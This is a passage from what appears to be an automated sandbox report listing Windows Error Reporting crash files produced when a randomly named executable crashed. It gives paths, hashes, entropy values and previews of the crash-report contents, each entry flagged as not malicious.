                                                                                                                                                                                                          SHA-512:EA66DE213AB2AEEA6AC2F1CC55C9B02D88F20F5137C0D2DF09F61785EDF92D1F3093B91CE6D0C89E398E529A0A02C9F2896CAB895D8A626D49DA4DC2A809B681
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.0.8.5.8.3.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.1.6.8.6.4.4.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.0.b.4.d.3.6.-.c.4.c.8.-.4.b.d.7.-.8.3.6.7.-.a.9.7.4.c.f.0.0.7.0.1.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.9.1.f.1.4.-.5.b.3.9.-.4.b.d.a.-.a.1.b.7.-.8.f.8.e.8.5.2.2.c.8.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.f.0.-.0.0.0.1.-.0.0.1.4.-.7.e.1.7.-.b.b.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_3eab609a-95bb-4512-beb1-ac2dbf6fcd4e\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9469025824641436
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vckEe0li0BU/N0ZjRJduzuiFOZ24IO8q/:VEzlpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:2856738848B0400993AA54EA8FB7AFAB
                                                                                                                                                                                                          SHA1:BB9C4A1AFE5D94301C82C42E7207A664D0A62CE3
                                                                                                                                                                                                          SHA-256:273C113666A11D15DE8E8381744974CEB7A280CF22CEB8125156A12D84E13FE6
                                                                                                                                                                                                          SHA-512:F28D457E955D8F8C47E2F21A0EB65279DBE0DA479D7E731F6C704894664C2C2304B398D7805FBF8F7EFD7CF7AB57B62BA83E4D2CC9C7B8AB0E82CD6E9E903DEE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.2.3.5.6.6.6.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.3.9.5.0.4.0.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.a.b.6.0.9.a.-.9.5.b.b.-.4.5.1.2.-.b.e.b.1.-.a.c.2.d.b.f.6.f.c.d.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.e.f.2.6.0.7.-.e.9.b.6.-.4.4.c.3.-.b.4.b.c.-.8.c.5.f.e.c.d.6.1.7.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.b.8.-.0.0.0.1.-.0.0.1.4.-.b.d.2.c.-.c.a.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_45301bcd-c67c-4ee3-9566-e15b7112f9e1\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9472135266131183
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:jZe0G3i0BU/N0ZjRJduzuiFOZ24IO8q/A:9zG3pBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:4BC7FFD8E28357BFD2B1BA24CD695EA0
                                                                                                                                                                                                          SHA1:2AD8F48A4140D4297F018BD4646D4C0917A06D33
                                                                                                                                                                                                          SHA-256:461968DDDE82EE8414F415F8DF94B643643894AC36E6AA6C3F7A8ABD96AA8136
                                                                                                                                                                                                          SHA-512:C33B64F1F0322DB2C170AF294A0AD20E353E695C106CB104F1C7A00E83C5D7FE6D340DF7224F8A7ADF58C3D8163AEE5C33A0803181BC591E4D98C5494644F1DF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.2.6.7.2.9.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.5.9.0.7.3.6.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.3.0.1.b.c.d.-.c.6.7.c.-.4.e.e.3.-.9.5.6.6.-.e.1.5.b.7.1.1.2.f.9.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.1.a.0.b.6.8.-.b.b.5.b.-.4.f.8.d.-.a.d.9.0.-.8.8.1.3.8.8.e.d.e.a.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.8.-.0.0.0.1.-.0.0.1.4.-.b.f.6.8.-.b.9.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_4fbe9264-4aff-4e14-8c1b-7c30f4351493\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9536346509424262
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:wjFe0Ri0BU/N0ZjRJdOzuiFOZ24IO8q/:cFzRpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:3DECFCF8D938B64D509951D3DAF2F64A
                                                                                                                                                                                                          SHA1:8B399040D9C7DB5731FAFDF64EA4A716F3AFDFFE
                                                                                                                                                                                                          SHA-256:AF841B97F1E4FF8FA52F32969F75A7E4AACCFACC360FE189DF7BA1AF571521A2
                                                                                                                                                                                                          SHA-512:D9772ABC9AED6BEB8D169C6AA8156200A1E267F7A9092EDB91E85FBA53708214BE5F7A0BAF8BC0BD0C68CE2841AB4FFD585D08EFADCE973E33DB1C4884FA5707
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.1.6.8.4.1.3.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.3.7.4.6.6.3.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.b.e.9.2.6.4.-.4.a.f.f.-.4.e.1.4.-.8.c.1.b.-.7.c.3.0.f.4.3.5.1.4.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.d.0.3.3.2.3.-.7.5.2.d.-.4.4.a.5.-.9.e.9.d.-.c.1.0.3.4.d.5.5.f.9.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.4.-.e.e.5.f.-.c.b.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_536039cd-858f-4430-a0d5-8260e16a5c17\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9533895994449075
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:gvke0Hi0BU/N0ZjRJdOzuiFnZ24IO8q/:rzHpBU/gjPczuiFnY4IO88
                                                                                                                                                                                                          MD5:F488AF9ADBC8DB680E5FD6A55E1A7701
                                                                                                                                                                                                          SHA1:8009A7CF93052CA0707012A749DC8B776FBD5F1B
                                                                                                                                                                                                          SHA-256:7C062EA5C7950912A99563464EB0A16F7336FEE928121E9A771E039CCDBCA112
                                                                                                                                                                                                          SHA-512:8756E2C69D9654ECF8D1F46B9FA5B87C157B64B40BBC60128F91DA73D9D60C9926196CB48731D910EB5335EEE43164DBD5B2310641DFFE3106DA2E68C1C52670
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.7.9.4.0.3.7.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.1.7.1.6.2.1.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.6.0.3.9.c.d.-.8.5.8.f.-.4.4.3.0.-.a.0.d.5.-.8.2.6.0.e.1.6.a.5.c.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.d.d.f.a.8.d.-.f.5.2.4.-.4.6.a.e.-.9.e.6.7.-.6.2.9.1.7.9.6.4.0.e.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.d.c.-.0.0.0.1.-.0.0.1.4.-.0.e.c.0.-.c.c.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_996d1024-2799-4328-9457-63c0c1112f5f\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9538671670722524
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:mQqe0Qi0BU/N0ZjRJdOzuiFOZ24IO8q/:fqzQpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:D3AD688EC917E2B4E80EFD16BD3D4F3E
                                                                                                                                                                                                          SHA1:3D5C9FB98313C9CC4634430450720F0981CA9DDB
                                                                                                                                                                                                          SHA-256:14B6A95664399721A5551D7922503A5D34337FF1E2C8176F248AAA337E987442
                                                                                                                                                                                                          SHA-512:89FB77B7ACA57AA336E578F6B8856A2858D94C50C1BD99183FEA3F6DB80C88B7A6D3702BC740462FD7C51A4C69F21F788DA20D996828EFE475CB47176968EF54
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.7.9.1.2.0.4.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.8.1.7.1.4.2.0.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.6.d.1.0.2.4.-.2.7.9.9.-.4.3.2.8.-.9.4.5.7.-.6.3.c.0.c.1.1.1.2.f.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.f.b.8.9.5.d.-.5.e.5.b.-.4.1.5.f.-.b.d.c.5.-.1.c.0.c.2.3.0.7.8.a.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.d.0.-.0.0.0.1.-.0.0.1.4.-.c.3.1.7.-.c.f.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_d6e1cbb3-475c-4918-84f9-58cfe3272fea\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9469302579266552
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:pvShPe0hi0BU/N0ZjRJduzuiFnZ24IO8q/:khPzhpBU/gjPczuiFnY4IO88
                                                                                                                                                                                                          MD5:596B949F9FCCF69AE474D0A58363EA21
                                                                                                                                                                                                          SHA1:80A70C4CE78497F6B967DBF906F8101C06EABCD1
                                                                                                                                                                                                          SHA-256:E28C3E8DE58ABF2B9090CAFDEF240D505709AE128B07ADD1152C755C739CCE13
                                                                                                                                                                                                          SHA-512:5ED1AA8E75FC88E5D3A7C0AB0A421EA1A121360F094ED54FD704466BD494935CD169BFE751FFBF3DC8D6353F695711F18C4BE9F997A1C9CE5BD51EA0CDE42AC1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.3.4.3.2.1.9.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.1.9.4.9.6.9.4.7.8.3.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.e.1.c.b.b.3.-.4.7.5.c.-.4.9.1.8.-.8.4.f.9.-.5.8.c.f.e.3.2.7.2.f.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.7.1.7.c.b.0.-.9.9.f.a.-.4.d.f.a.-.9.f.9.e.-.8.f.f.d.8.7.9.1.9.c.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.0.-.0.0.0.1.-.0.0.1.4.-.c.f.0.2.-.b.6.7.c.5.e.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.1.b.3.0.4.8.d.5.3.4.0.f.e.7.8.a.9.5.6.8.d.b.e.6.0.d.3.6.2.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.P.t.w.t.z.G.y.O.d.A.t.B...e.x.e.....T.a.r.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CE7.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:51 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):96004
                                                                                                                                                                                                          Entropy (8bit):1.8338432458265894
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:43EQUWR7lOQUXbIKwl7gI/CbLSPOlvUT+Y+midT:wEQUixOQUX0Kw19/CbLSPOlDY+m
                                                                                                                                                                                                          MD5:A45A21516BCB1F608BD8ED3E0FD48A10
                                                                                                                                                                                                          SHA1:3D9E4984F4D4107E06A0A5EC730C30A0F2A49190
                                                                                                                                                                                                          SHA-256:645B4F4C82AA39A874B50538B32BA5BDB38F0C530B645EAA6C10282ED4256643
                                                                                                                                                                                                          SHA-512:CA1A4B3167B89DC6F4341711ECE6B5DFC69AF53D45851F5C61F26C46524C46ACA2FC7C1E6A584B2C3E37390200C391E45BBDD30353BA887735BA7535321077EF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........=2g.........................................>..........T.......8...........T............ ..$V..........P...........<...............................................................................eJ..............GenuineIntel............T............=2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC3.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8366
                                                                                                                                                                                                          Entropy (8bit):3.7023007894350357
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJC56L6YSiSU9FEgmfmgprp89bissfQ2m:R6lXJ06L6Y3SU9mgmfmzi/fI
                                                                                                                                                                                                          MD5:678A9558D35918137F32BD9F44C86FE2
                                                                                                                                                                                                          SHA1:6E63D2C21A54AF0003EFF9C3883A14FF831C4323
                                                                                                                                                                                                          SHA-256:6238A6690E429761FF45EFAEB398189F509C97E66454F01677D086BAECFB1791
                                                                                                                                                                                                          SHA-512:51F86411560824DBBA5B6CBD051D9E67EE1A8E4A13F15E33FD5992748A46B40638CDB83CB34A649D3D5FE50DA16B4189ECCD3A872E0C97A7C9E8F7F51A95C8B5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.0.0.<./.P.i.

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E41.tmp.xml

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4634
                                                                                                                                                                                                          Entropy (8bit):4.514987635641395
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsgJg77aI98AAXWpW8VYOYm8M4JCKgwFEt+q8dg1SHvlvYd:uIjfmI72AAm7V6JCKWSEevlvYd
                                                                                                                                                                                                          MD5:7DF35B22AF9379863FDB73B03D717734
                                                                                                                                                                                                          SHA1:6EFECC56BC5E96E255F5EE8749926D3CA6B0CE70
                                                                                                                                                                                                          SHA-256:D5610AE34D2E21E1A3FA74A4AF87DC95AF835B34C6A36364D2D172E7F8F1752B
                                                                                                                                                                                                          SHA-512:2E66A7777E9AE2E2A5440505F5829488622A159BD3504AFDF48978A8C5B3F85BE67610C7DE4566C03E43AFF70182672D25BE11165F0D0B092C862019BE6778A7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583707" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER23DD.tmp.dmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:24:52 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):91280
                                                                                                                                                                                                          Entropy (8bit):1.875930303860812
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:xQUWRainOnpg30IyA4wgeoOnt7COW+4K5/CfI2Zo4asI/HvW:xQUiVnOpxIyAX3Pt7C1I/
                                                                                                                                                                                                          MD5:56110864785D5AE4EA5D8B7C531C55A4
                                                                                                                                                                                                          SHA1:10A151EEDA3C53885EE59E9ADFC948C4919866AA
